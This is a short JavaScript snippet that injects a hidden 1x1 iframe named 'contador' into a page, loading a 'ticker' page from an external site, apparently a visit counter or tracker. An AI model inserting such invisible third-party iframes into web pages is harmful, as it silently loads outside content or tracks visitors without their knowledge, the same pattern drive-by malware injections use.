var iframeTag = document.createElement('iframe');iframeTag.setAttribute('name','contador');iframeTag.setAttribute('src', 'http://www.llegoemail.com/ticker.html');iframeTag.setAttribute('marginwidth','1');iframeTag.setAttribute('marginheight','1');iframeTag.setAttribute('scrolling','no');iframeTag.setAttribute('border','0');iframeTag.setAttribute('frameborder','0');iframeTag.setAttribute('width','1');iframeTag.setAttribute('height','1');iframeTag.style.display = 'none';document.body.appendChild(iframeTag);